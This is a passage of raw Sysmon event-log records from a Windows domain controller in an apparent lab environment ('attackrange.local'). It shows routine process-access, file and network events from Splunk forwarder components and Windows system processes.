Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201922Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E81F-6040-124E-00000000AD01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201921Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201920Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201919Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201918Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201917Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E81F-6040-124E-00000000AD01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201916Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.389{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E81F-6040-124E-00000000AD01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201915Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.390{5ABCFE62-E81F-6040-124E-00000000AD01}3384C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201914Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:03.374{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=210A2F27FAE0542738812EB623ED8426,SHA256=846C13C2E3EC24CDB38A8A01540B35D0A2ED4CEADB43C62625DECB669306FDDF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201927Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:04.983{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4A506D40F4F5CB49A8B48A250B06882,SHA256=CA696AAD33356091F3801147683CEAA2EA375521C7D374B0D45947B910C202D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201926Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:01.023{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60591-false10.0.1.12-8000- 23542300x80000000000000002201925Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:04.436{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=30916CABAA8F7BB5B4F2DF4BD0C06175,SHA256=7FABB12EAD37B65D6F81440B2BF0107A2420691CFFA64163ED2C48705BE84E24,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201928Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:05.983{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FA5272E6282953515A4E1FE56ACDB8D,SHA256=E61329402C529BDA9B36FA26B15704404FDF7397A456AFB309683157998F0A51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201929Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:06.858{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201931Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:07.874{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8DED9A0FC1C1C00E1DBE569EC61256A7,SHA256=51755EA2EE3178CADE9D439C03C769204579228CCB9B388B80CD71E55541C47B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201930Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:06.999{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=146CCB83EA7814577989C84A14ACF42E,SHA256=EE2B4AC610083309407455A15B537342FC4959B96C7FE5746FF9068D4224B083,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201932Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:08.014{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60D5EF389476E6279595E1DA2F754B44,SHA256=9EEE13A1C0622A2F46D699074291AD4EACEA49DE4E358F5E03422A09D79D7D59,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201935Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:09.296{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=064E33A85D20A8B47C7E770B2A0DE48E,SHA256=80A6BF669CAE46392881CA9F476A8F31BC6002CE6FD8B87757D8096FC12CBB4C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201934Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:04.679{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60592-false10.0.1.12-8089- 23542300x80000000000000002201933Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:09.030{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DC0DB399870497E289AC530101D52A81,SHA256=251CE3C543E5E068E013143BC9F468BD3DA0E2447DA8C70357D6D75FE0A55B9F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201936Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:10.046{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78864F0C9FD4A49531970A49E64F58DF,SHA256=4A20371DB711551BBB509BA85F797AB4BDBF1AE37C6EED02648D84A4A6880E5E,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201938Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:06.069{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60593-false10.0.1.12-8000- 23542300x80000000000000002201937Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:11.077{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B3BF50CF4C4A408EC36B048040ED9F,SHA256=E73449102142FA52136C38B15E1991A0FD4D4BB31B778DBBBB7D7755549053E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201939Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:12.093{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1C130E33FA61F4635B57CE206C65442,SHA256=5B80526B21823B423F214FE8E5B88C96DD8525107122AC16AA273C7D2283DB78,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201940Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:13.108{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=778586D4C7979F71E8E51DB99634FB65,SHA256=326623F880956437360DFC2CF6336D84D20F39A55FC8337963C4E941411CE5AD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201942Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:14.626{5ABCFE62-842F-603E-0D00-00000000AD01}9124764C:\Windows\system32\svchost.exe{5ABCFE62-99F4-603E-8307-00000000AD01}1624C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201941Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:14.110{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D0AB1D8BB201939F4FF05DA59799CB1,SHA256=3EF25E6A524EFF58DE851A16B76FBCBBB3F35FD6C50EB8AFC6132CC617C780F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201945Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:15.126{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2E97BFBE5B00623073C99061B82DC9FD,SHA256=FCDEDF1630319907CCE8E1CECBEF164DD8A6D64D17BCB5FE658D948960E4F167,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201944Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:15.126{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8E52EF7BA3A33100DF4119FCFA97E0B0,SHA256=4CC0AC7C207169FACB25876A38675CC446908D8F9AB07AD6AE00BBB3AD910B15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201943Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:15.126{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F2989A9A8D04EAAC3B705649601B84BE,SHA256=733999C44A4B7DDD1BFE316F905B125FB67374CF527878FCE9DB3E3E6D583FBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201946Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:16.145{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3815583603703C815385A2950440BA,SHA256=D29D7F247575D36DBA850103EB05A187B0365CB16B1F39E88CFE685FDBC09F99,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201957Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.551{5ABCFE62-E82D-6040-134E-00000000AD01}30405896C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201956Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E82D-6040-134E-00000000AD01}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201955Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201954Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201953Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201952Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201951Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E82D-6040-134E-00000000AD01}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201950Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:01:17.410{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E82D-6040-134E-00000000AD01}3040C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 